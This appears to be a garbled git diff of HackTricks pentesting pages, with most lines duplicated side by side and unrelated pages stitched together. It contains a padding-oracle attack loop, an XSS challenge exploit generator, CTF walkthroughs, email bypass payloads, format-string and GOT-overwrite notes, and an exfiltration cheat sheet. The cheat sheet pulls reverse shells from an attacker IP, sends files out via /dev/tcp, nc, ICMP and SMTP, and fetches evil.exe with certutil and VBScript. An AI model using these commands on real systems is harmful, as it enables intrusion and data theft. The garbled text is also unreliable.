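The chain above can be sketched as a loop, assuming a hypothetical `oracle(prev_block, block)` that returns `True` when decryption yields valid padding; it recovers the intermediate state `I`, which XORed with the real previous block (or IV) gives the plaintext:

```python
def recover_intermediate(oracle, block: bytes, bs: int = 16) -> bytes:
    I = bytearray(bs)
    for pad in range(1, bs + 1):           # target padding \x01, then \x02, ...
        pos = bs - pad
        for guess in range(256):
            fake = bytearray(bs)
            fake[pos] = guess
            for j in range(pos + 1, bs):   # force already-known bytes to decrypt to 'pad'
                fake[j] = I[j] ^ pad
            if oracle(bytes(fake), block):
                I[pos] = guess ^ pad       # the decrypted byte was 'pad'
                break
    return bytes(I)  # plaintext = I XOR real previous block (or IV)
```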
### Detection of the vulnerability ## Detection of the vulnerability
Register an account and log in with this account.\ Register an account and log in with this account.\
If you **log in many times** and always get the **same cookie**, there is probably **something** **wrong** in the application. The **cookie sent back should be unique** each time you log in. If the cookie is **always** the **same**, it will probably always be valid and there **won't be any way to invalidate it**. If you **log in many times** and always get the **same cookie**, there is probably **something** **wrong** in the application. The **cookie sent back should be unique** each time you log in. If the cookie is **always** the **same**, it will probably always be valid and there **won't be any way to invalidate it**.
@ -118,7 +116,7 @@ If you **log in many times** and always get the **same cookie**, there is probab
Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\ Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\
But if you BF the padding (using padbuster for example) and manage to get another cookie valid for a different user, this scenario is highly likely vulnerable to padbuster. But if you BF the padding (using padbuster for example) and manage to get another cookie valid for a different user, this scenario is highly likely vulnerable to padbuster.
## References # References
* [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation) * [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation)
@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# RC4 - Encrypt\&Decrypt
If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function. If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function.
If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
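This works because RC4 is a stream cipher: encryption and decryption are the same XOR against the keystream. A minimal sketch:

```python
def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):                       # KSA: key scheduling
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for b in data:                             # PRGA: keystream generation
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# The same call encrypts and decrypts:
assert rc4(b"key", rc4(b"key", b"plaintext")) == b"plaintext"
```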
@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# CTF Write-ups
* [Write-up factory](https://writeup.raw.pm/) - Search engine to find write-ups \(TryHackMe, HackTheBox, etc.\) * [Write-up factory](https://writeup.raw.pm/) - Search engine to find write-ups \(TryHackMe, HackTheBox, etc.\)
* [CTFtime Write-ups](https://ctftime.org/writeups) - Newest write-ups added to CTF events on CTFtime * [CTFtime Write-ups](https://ctftime.org/writeups) - Newest write-ups added to CTF events on CTFtime
@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# challenge-0521.intigriti.io ## Brief Description <a href="brief-description" id="brief-description"></a>
### Brief Description <a href="brief-description" id="brief-description"></a>
The challenge provides a form vulnerable to XSS in the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php).\ The challenge provides a form vulnerable to XSS in the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php).\
This form is loaded in [https://challenge-0521.intigriti.io/](https://challenge-0521.intigriti.io) via an iframe. This form is loaded in [https://challenge-0521.intigriti.io/](https://challenge-0521.intigriti.io) via an iframe.
@ -28,7 +26,7 @@ It was found that the form will **insert the user input inside the JavaScript `e
However, before inserting the user input inside the `eval` function, it's checked with the regexp `/[a-df-z<>()!\\='"]/gi` so if any of those characters is found, the user input won't be executed inside `eval`.\ However, before inserting the user input inside the `eval` function, it's checked with the regexp `/[a-df-z<>()!\\='"]/gi` so if any of those characters is found, the user input won't be executed inside `eval`.\
Anyway, a way was found to bypass the regexp protection and execute `alert(document.domain)` abusing the dangerous `eval` function. Anyway, a way was found to bypass the regexp protection and execute `alert(document.domain)` abusing the dangerous `eval` function.
### Accessing the HTML <a href="accessing-the-html" id="accessing-the-html"></a> ## Accessing the HTML <a href="accessing-the-html" id="accessing-the-html"></a>
It was found that the letter `e` is permitted as user input. It was also found that there is an HTML element using the `id="e"`. Therefore, this HTML element is accessible from JavaScript just using the variable `e`:\ It was found that the letter `e` is permitted as user input. It was also found that there is an HTML element using the `id="e"`. Therefore, this HTML element is accessible from JavaScript just using the variable `e`:\
![](https://i.imgur.com/Slq2Xal.png) ![](https://i.imgur.com/Slq2Xal.png)
@ -53,7 +51,7 @@ Then, from the `e` HTML element its possible to access the `document` object
e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"] e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]
``` ```
### Calling a function without parenthesis with JS code as string <a href="calling-a-function-without-parenthesis-with-js-code-as-string" id="calling-a-function-without-parenthesis-with-js-code-as-string"></a> ## Calling a function without parenthesis with JS code as string <a href="calling-a-function-without-parenthesis-with-js-code-as-string" id="calling-a-function-without-parenthesis-with-js-code-as-string"></a>
From the object `document` its possible to call the `write` function to **write arbitrary HTML text that the browser will execute**.\ From the object `document` its possible to call the `write` function to **write arbitrary HTML text that the browser will execute**.\
However, as the `()` characters are **forbidden**, it's not possible to call the function using them. Anyway, it's possible to call a function using **backticks** (\`\`).\ However, as the `()` characters are **forbidden**, it's not possible to call the function using them. Anyway, it's possible to call a function using **backticks** (\`\`).\
@ -71,7 +69,7 @@ e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]
You can test this code in a JavaScript console inside the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php) You can test this code in a JavaScript console inside the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php)
### Final forbidden characters bypass <a href="final-forbidden-characters-bypass" id="final-forbidden-characters-bypass"></a> ## Final forbidden characters bypass <a href="final-forbidden-characters-bypass" id="final-forbidden-characters-bypass"></a>
However, there is still one problem left. Most of the characters of the exploit are **forbidden** as they appear in the regexp `/[a-df-z<>()!\\='"]/gi`. But note how all the **forbidden characters are strings** inside the exploit and the **non-string characters in the exploit (e\[]\`${}) are allowed**.\ However, there is still one problem left. Most of the characters of the exploit are **forbidden** as they appear in the regexp `/[a-df-z<>()!\\='"]/gi`. But note how all the **forbidden characters are strings** inside the exploit and the **non-string characters in the exploit (e\[]\`${}) are allowed**.\
This means that if it's possible to **generate the forbidden characters as strings from the allowed characters**, it's possible to generate the exploit.\ This means that if it's possible to **generate the forbidden characters as strings from the allowed characters**, it's possible to generate the exploit.\
@ -85,7 +83,7 @@ Using these tricks and some more complex ones it was possible to **generate all
e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]`${"<script>alert(document.location)</script>"}` e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]`${"<script>alert(document.location)</script>"}`
``` ```
### Exploit Code <a href="exploit-code" id="exploit-code"></a> ## Exploit Code <a href="exploit-code" id="exploit-code"></a>
This is the Python script used to generate the final exploit. If you execute it, it will print the exploit: This is the Python script used to generate the final exploit. If you execute it, it will print the exploit:
@ -158,7 +156,7 @@ txt = f'{document}[{write}]'+'`${['+payload+']}`'
print(txt) #Write the exploit to stdout print(txt) #Write the exploit to stdout
``` ```
### Exploitation <a href="exploitation" id="exploitation"></a> ## Exploitation <a href="exploitation" id="exploitation"></a>
In order to generate the exploit just execute the previous python code. If you prefer, you can also copy/paste it from here: In order to generate the exploit just execute the previous python code. If you prefer, you can also copy/paste it from here:
@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Try Hack Me
<details> <details>
@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# hc0n Christmas CTF - 2019
![](../../.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg) ![](../../.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg)
## Enumeration # Enumeration
I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion): I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
@ -16,13 +16,12 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Pickle Rick
![](../../.gitbook/assets/picklerick.gif) ![](../../.gitbook/assets/picklerick.gif)
This machine was categorised as easy and it was pretty easy. This machine was categorised as easy and it was pretty easy.
### Enumeration # Enumeration
I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion): I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
@ -50,7 +49,7 @@ Checking the source code of the root page, a username is discovered: `R1ckRul3s`
Therefore, you can login on the login page using the credentials `R1ckRul3s:Wubbalubbadubdub` Therefore, you can login on the login page using the credentials `R1ckRul3s:Wubbalubbadubdub`
### User # User
Using those credentials you will access a portal where you can execute commands: Using those credentials you will access a portal where you can execute commands:
@ -72,7 +71,7 @@ The **second ingredient** can be found in `/home/rick`
![](<../../.gitbook/assets/image (240).png>) ![](<../../.gitbook/assets/image (240).png>)
### Root # Root
The user **www-data can execute anything as sudo**: The user **www-data can execute anything as sudo**:
@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Emails Vulnerabilities # Payloads
## Payloads ## Ignored parts of an email
### Ignored parts of an email
The symbols **+, -** and **{}** can on rare occasions be used for tagging and are ignored by most e-mail servers The symbols **+, -** and **{}** can on rare occasions be used for tagging and are ignored by most e-mail servers
@ -31,43 +29,43 @@ The symbols: **+, -** and **{}** in rare occasions can be used for tagging and i
* E.g. john.doe(intigriti)@example.com → john.doe@example.com * E.g. john.doe(intigriti)@example.com → john.doe@example.com
### Whitelist bypass ## Whitelist bypass
* inti(;inti@inti.io;)@whitelisted.com * inti(;inti@inti.io;)@whitelisted.com
* inti@inti.io(@whitelisted.com) * inti@inti.io(@whitelisted.com)
* inti+(@whitelisted.com;)@inti.io * inti+(@whitelisted.com;)@inti.io
### IPs ## IPs
You can also use IPs as domain names between square brackets: You can also use IPs as domain names between square brackets:
* john.doe@\[127.0.0.1] * john.doe@\[127.0.0.1]
* john.doe@\[IPv6:2001:db8::1] * john.doe@\[IPv6:2001:db8::1]
### Other vulns ## Other vulns
![](<.gitbook/assets/image (296).png>) ![](<.gitbook/assets/image (296).png>)
## Third party SSO # Third party SSO
### XSS ## XSS
Some services like **github** or **salesforce allow** you to create an **email address with XSS payloads in it**. If you can **use these providers to log in to other services** and these services **aren't sanitising** the email correctly, you could cause **XSS**. Some services like **github** or **salesforce allow** you to create an **email address with XSS payloads in it**. If you can **use these providers to log in to other services** and these services **aren't sanitising** the email correctly, you could cause **XSS**.
### Account-Takeover ## Account-Takeover
If an **SSO service** allows you to **create an account without verifying the given email address** (like **salesforce**) and you can then use that account to **log in to a different service** that **trusts** salesforce, you could access any account.\ If an **SSO service** allows you to **create an account without verifying the given email address** (like **salesforce**) and you can then use that account to **log in to a different service** that **trusts** salesforce, you could access any account.\
_Note that salesforce indicates whether the given email was verified or not, so the application should take this info into account._ _Note that salesforce indicates whether the given email was verified or not, so the application should take this info into account._
## Reply-To # Reply-To
You can send an email using _**From: company.com**_ and _**Reply-To: attacker.com**_, and if any **automatic reply** is sent because the email was sent **from** an **internal address**, the **attacker** may be able to **receive** that **response**. You can send an email using _**From: company.com**_ and _**Reply-To: attacker.com**_, and if any **automatic reply** is sent because the email was sent **from** an **internal address**, the **attacker** may be able to **receive** that **response**.
## **References** # **References**
* [**https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view**](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view) * [**https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view**](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)
## Hard Bounce Rate # Hard Bounce Rate
Some applications like AWS have a **Hard Bounce Rate** (in AWS it is 10%); whenever it is exceeded, the email service is blocked. Some applications like AWS have a **Hard Bounce Rate** (in AWS it is 10%); whenever it is exceeded, the email service is blocked.
@ -17,27 +17,25 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Exfiltration # Copy\&Paste Base64
## Copy\&Paste Base64 ### Linux
#### Linux
```bash ```bash
base64 -w0 <file> #Encode file base64 -w0 <file> #Encode file
base64 -d file #Decode file base64 -d file #Decode file
``` ```
#### Windows ### Windows
``` ```
certutil -encode payload.dll payload.b64 certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll certutil -decode payload.b64 payload.dll
``` ```
## HTTP # HTTP
#### Linux ### Linux
```bash ```bash
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
@ -46,7 +44,7 @@ curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD fetch 10.10.14.14:8000/shell.py #FreeBSD
``` ```
#### Windows ### Windows
```bash ```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
@ -63,11 +61,11 @@ Start-BitsTransfer -Source $url -Destination $output
Start-BitsTransfer -Source $url -Destination $output -Asynchronous Start-BitsTransfer -Source $url -Destination $output -Asynchronous
``` ```
### Upload files ## Upload files
[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170) [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
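As an alternative, a minimal raw-POST receiver can be sketched with Python's stdlib (the output filename and port are arbitrary choices):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class UploadHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Read the raw request body and dump it to disk
        length = int(self.headers.get("Content-Length", 0))
        with open("uploaded.bin", "wb") as f:   # arbitrary output filename
            f.write(self.rfile.read(length))
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"OK")

# Run with: HTTPServer(("0.0.0.0", 8000), UploadHandler).serve_forever()
```

From the victim, something like `curl -X POST --data-binary @file http://<ATTACKER>:8000/` would then exfiltrate the file.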
### **HTTPS Server** ## **HTTPS Server**
```python ```python
# from https://gist.github.com/dergachev/7028596 # from https://gist.github.com/dergachev/7028596
@ -79,25 +77,25 @@ Start-BitsTransfer -Source $url -Destination $output -Asynchronous
# then in your browser, visit: # then in your browser, visit:
# https://localhost:443 # https://localhost:443
#### PYTHON 2 ### PYTHON 2
import BaseHTTPServer, SimpleHTTPServer import BaseHTTPServer, SimpleHTTPServer
import ssl import ssl
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler) httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever() httpd.serve_forever()
#### ###
#### PYTHON3 ### PYTHON3
from http.server import HTTPServer, BaseHTTPRequestHandler from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl import ssl
httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler) httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True) httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever() httpd.serve_forever()
#### ###
#### USING FLASK ### USING FLASK
from flask import Flask, redirect, request from flask import Flask, redirect, request
from urllib.parse import quote from urllib.parse import quote
app = Flask(__name__) app = Flask(__name__)
@ -107,26 +105,26 @@ def root():
return "OK" return "OK"
if __name__ == "__main__": if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
#### ###
``` ```
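Note that `ssl.wrap_socket` was removed in Python 3.12, so on modern Python the same HTTPS server needs an `ssl.SSLContext`. A minimal sketch, assuming the same `./server.pem` (certificate plus key in one file) as above:

```python
# ssl.wrap_socket() was removed in Python 3.12; use an SSLContext instead.
# Assumes ./server.pem contains both the certificate and the private key.
import ssl
from http.server import HTTPServer, SimpleHTTPRequestHandler

def serve_https(certfile="./server.pem", port=443):
    httpd = HTTPServer(("0.0.0.0", port), SimpleHTTPRequestHandler)
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(certfile)
    httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
    httpd.serve_forever()
```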
## FTP # FTP
### FTP server (python) ## FTP server (python)
```bash ```bash
pip3 install pyftpdlib pip3 install pyftpdlib
python3 -m pyftpdlib -p 21 python3 -m pyftpdlib -p 21
``` ```
### FTP server (NodeJS) ## FTP server (NodeJS)
``` ```
sudo npm install -g ftp-srv --save sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp ftp-srv ftp://0.0.0.0:9876 --root /tmp
``` ```
### FTP server (pure-ftp) ## FTP server (pure-ftp)
```bash ```bash
apt-get update && apt-get install pure-ftp apt-get update && apt-get install pure-ftp
@ -146,7 +144,7 @@ chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart /etc/init.d/pure-ftpd restart
``` ```
### **Windows** client ## **Windows** client
```bash ```bash
#Work well with python. With pure-ftp use fusr:ftp #Work well with python. With pure-ftp use fusr:ftp
@ -159,7 +157,7 @@ echo bye >> ftp.txt
ftp -n -v -s:ftp.txt ftp -n -v -s:ftp.txt
``` ```
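The same command file can also be generated programmatically. A hedged sketch (the host, credentials and file name are placeholders for your own setup):

```python
# Sketch: build the ftp.txt command file used by `ftp -n -v -s:ftp.txt`.
# Host, credentials and file name are placeholders, not fixed values.
def build_ftp_script(host, user="anonymous", password="password", fname="nc.exe"):
    lines = [
        "open " + host,   # connect to the attacker's FTP server
        "USER " + user,   # -n suppresses auto-login, so send USER manually
        password,
        "binary",         # binary mode so the exe is not mangled
        "GET " + fname,
        "bye",
    ]
    return "\n".join(lines) + "\n"

script = build_ftp_script("10.11.0.41")
```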
## SMB # SMB
Kali as server Kali as server
@ -197,7 +195,7 @@ WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.1
WindPS-2> cd new_disk: WindPS-2> cd new_disk:
``` ```
## SCP # SCP
The attacker has to have SSHd running. The attacker has to have SSHd running.
@ -205,23 +203,23 @@ The attacker has to have SSHd running.
scp <username>@<Attacker_IP>:<directory>/<filename> scp <username>@<Attacker_IP>:<directory>/<filename>
``` ```
## NC # NC
```bash ```bash
nc -lvnp 4444 > new_file nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file nc -vn <IP> 4444 < exfil_file
``` ```
## /dev/tcp # /dev/tcp
### Download file from victim ## Download file from victim
```bash ```bash
nc -lvnp 80 > file #Inside attacker nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
``` ```
### Upload file to victim ## Upload file to victim
```bash ```bash
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
@ -232,7 +230,7 @@ cat <&6 > file.txt
thanks to **@BinaryShadow\_** thanks to **@BinaryShadow\_**
## **ICMP** # **ICMP**
```bash ```bash
#In order to exfiltrate the content of a file via pings you can do: #In order to exfiltrate the content of a file via pings you can do:
@ -252,7 +250,7 @@ def process_packet(pkt):
sniff(iface="tun0", prn=process_packet) sniff(iface="tun0", prn=process_packet)
``` ```
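The sending side can be sketched as a simple chunker that feeds the sniffer above. The 4-byte chunk size, target IP and the scapy call are assumptions, not part of the original:

```python
# Hypothetical sender-side sketch for the sniffer above: split the file into
# small chunks that fit in the ICMP payload/pattern (chunk size is a choice).
def chunk_file(data: bytes, size: int = 4):
    return [data[i:i + size] for i in range(0, len(data), size)]

chunks = chunk_file(b"root:x:0:0:", 4)
# each chunk could then be sent, e.g. with scapy:
#   send(IP(dst="10.10.10.10")/ICMP()/chunk)
```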
## **SMTP** # **SMTP**
If you can send data to an SMTP server, you can create an SMTP server to receive the data with Python: If you can send data to an SMTP server, you can create an SMTP server to receive the data with Python:
@ -260,7 +258,7 @@ If you can send data to an SMTP server, you can create a SMTP to receive the dat
sudo python -m smtpd -n -c DebuggingServer :25 sudo python -m smtpd -n -c DebuggingServer :25
``` ```
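On the victim side you could then build a mail with the loot attached and push it to that DebuggingServer. A sketch (addresses and host are placeholders; the actual send line is commented out):

```python
# Sketch of the victim side: attach the loot to an email and send it to the
# attacker's DebuggingServer. Addresses and host are placeholders.
import smtplib
from email.message import EmailMessage

def build_mail(data: bytes, attacker="attacker@10.10.14.2"):
    msg = EmailMessage()
    msg["From"] = "victim@victim"
    msg["To"] = attacker
    msg["Subject"] = "exfil"
    msg.add_attachment(data, maintype="application",
                       subtype="octet-stream", filename="loot.bin")
    return msg

msg = build_mail(b"secret-data")
# smtplib.SMTP("10.10.14.2", 25).send_message(msg)  # run this on the victim
```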
## TFTP # TFTP
By default in XP and 2003 (in others it needs to be explicitly added during installation) By default in XP and 2003 (in others it needs to be explicitly added during installation)
@ -286,7 +284,7 @@ In **victim**, connect to the Kali server:
tftp -i <KALI-IP> get nc.exe tftp -i <KALI-IP> get nc.exe
``` ```
## PHP # PHP
Download a file with a PHP oneliner: Download a file with a PHP oneliner:
@ -294,13 +292,13 @@ Download a file with a PHP oneliner:
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
``` ```
## VBScript # VBScript
```bash ```bash
Attacker> python -m SimpleHTTPServer 80 Attacker> python -m SimpleHTTPServer 80
``` ```
#### Victim ### Victim
```bash ```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo strUrl = WScript.Arguments.Item(0) > wget.vbs
@ -334,7 +332,7 @@ echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
``` ```
## Debug.exe # Debug.exe
This is a crazy technique that works on 32-bit Windows machines. Basically the idea is to abuse the `debug.exe` program: it is used to inspect binaries, like a debugger, but it can also rebuild them from hex. So we take a binary, like `netcat`, dump it to hex, paste the hex into a file on the compromised machine, and then reassemble it with `debug.exe`. This is a crazy technique that works on 32-bit Windows machines. Basically the idea is to abuse the `debug.exe` program: it is used to inspect binaries, like a debugger, but it can also rebuild them from hex. So we take a binary, like `netcat`, dump it to hex, paste the hex into a file on the compromised machine, and then reassemble it with `debug.exe`.
@ -352,7 +350,7 @@ wine exe2bat.exe nc.exe nc.txt
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
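The idea behind exe2bat can be sketched as a hypothetical re-implementation: emit `debug.exe` commands that rebuild the binary byte by byte (`e` enters bytes, `rcx` sets the file length, `w` writes, `q` quits). This is a simplified sketch, not the actual exe2bat output format:

```python
# Hypothetical sketch of the exe2bat idea: emit debug.exe commands that
# rebuild a binary byte by byte. debug.exe loads data at offset 0x100 and
# only handles files under 64KB.
def to_debug_script(data: bytes, name: str = "NC.EXE"):
    lines = ["n " + name]                      # output file name
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        hexbytes = " ".join(f"{b:02x}" for b in chunk)
        lines.append(f"e {0x100 + off:04x} {hexbytes}")  # data starts at 0x100
    lines += ["rcx", f"{len(data):x}", "w", "q"]
    return "\r\n".join(lines) + "\r\n"

script = to_debug_script(b"MZ\x90\x00")
```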
## DNS # DNS
[https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
View file
@ -16,9 +16,8 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Linux Exploiting (Basic) (SPA)
### **ASLR** # **ASLR**
Address randomization Address randomization
@ -63,7 +62,7 @@ int i = 5;
**STACK section**: The stack (passed arguments, environment strings (env), local variables…) **STACK section**: The stack (passed arguments, environment strings (env), local variables…)
### **1.STACK OVERFLOWS** # **1.STACK OVERFLOWS**
> buffer overflow, buffer overrun, stack overrun, stack smashing > buffer overflow, buffer overrun, stack overrun, stack smashing
@ -75,15 +74,15 @@ Para obtener la dirección de una función dentro de un programa se puede hacer:
objdump -d ./PROGRAMA | grep FUNCION objdump -d ./PROGRAMA | grep FUNCION
``` ```
### ROP # ROP
#### Call to sys\_execve ## Call to sys\_execve
{% content-ref url="rop-syscall-execv.md" %} {% content-ref url="rop-syscall-execv.md" %}
[rop-syscall-execv.md](rop-syscall-execv.md) [rop-syscall-execv.md](rop-syscall-execv.md)
{% endcontent-ref %} {% endcontent-ref %}
### **2.SHELLCODE** # **2.SHELLCODE**
See kernel interrupts (syscall numbers): cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep “\_\_NR\_” See kernel interrupts (syscall numbers): cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep “\_\_NR\_”
@ -219,7 +218,7 @@ En fvuln se puede introducir un EBP falso que apunte a un sitio donde esté la d
**Off-by-One Exploit**\ **Off-by-One Exploit**\
Only the least significant byte of the EBP can be modified. An attack like the previous one can be carried out, but the memory storing the shellcode address must share its first 3 bytes with the EBP. Only the least significant byte of the EBP can be modified. An attack like the previous one can be carried out, but the memory storing the shellcode address must share its first 3 bytes with the EBP.
### **4. Return to Libc methods** # **4. Return to Libc methods**
A useful method when the stack is not executable or leaves a very small buffer to modify. A useful method when the stack is not executable or leaves a very small buffer to modify.
@ -277,7 +276,7 @@ Esta shellcode se puede repetir indefinidamente en las partes de memoria a las q
(Function execution is chained by mixing the EBP and ret2lib vulnerabilities seen previously) (Function execution is chained by mixing the EBP and ret2lib vulnerabilities seen previously)
### **5. Complementary methods** # **5. Complementary methods**
**Ret2Ret** **Ret2Ret**
@ -370,7 +369,7 @@ Este tipo de overflows no busca lograr escribir algo en el proceso del programa,
The value an uninitialized variable may take is unknown and it could be interesting to observe it. It may take the value a variable of the previous function held, and that value may be controlled by the attacker. The value an uninitialized variable may take is unknown and it could be interesting to observe it. It may take the value a variable of the previous function held, and that value may be controlled by the attacker.
### **Format Strings** # **Format Strings**
In C **`printf`** is a function that can be used to **print** a string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** in the raw text. In C **`printf`** is a function that can be used to **print** a string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** in the raw text.
@ -395,7 +394,7 @@ AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500 AAAA.%500\$08x —> Param at offset 500
``` ```
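The precision in payloads like the ones above must account for the bytes already printed before the `%hn` fires. A small helper to compute it (a sketch; the values are examples, not taken from a real binary):

```python
# Sketch: compute the "%.<pad>x" precision needed so that a following %hn
# stores `target` (a 2-byte short) once `written` bytes are already printed.
def pad_for_hn(target: int, written: int) -> int:
    return (target - written) % 0x10000

# example: 8 bytes of addresses already printed, want to store 0x9726
pad = pad_for_hn(0x9726, 8)
total_printed = 8 + pad
```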
#### \*\*GOT (Global Offsets Table) / PLT (\*\*Procedure Linkage Table) ## \*\*GOT (Global Offsets Table) / PLT (\*\*Procedure Linkage Table)
This is the table that contains the **address** to the **external functions** used by the program. This is the table that contains the **address** to the **external functions** used by the program.
@ -420,7 +419,7 @@ Then, the **next time** a call is performed to that address the **function** is
You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`** You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`**
#### **Exploit Flow** ## **Exploit Flow**
As explained before the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Ideally we could set the **address to a shellcode** located in an executable section, but most likely you won't be able to write shellcode in an executable section.\ As explained before the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Ideally we could set the **address to a shellcode** located in an executable section, but most likely you won't be able to write shellcode in an executable section.\
So a different option is to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**. So a different option is to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**.
@ -442,7 +441,7 @@ HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\
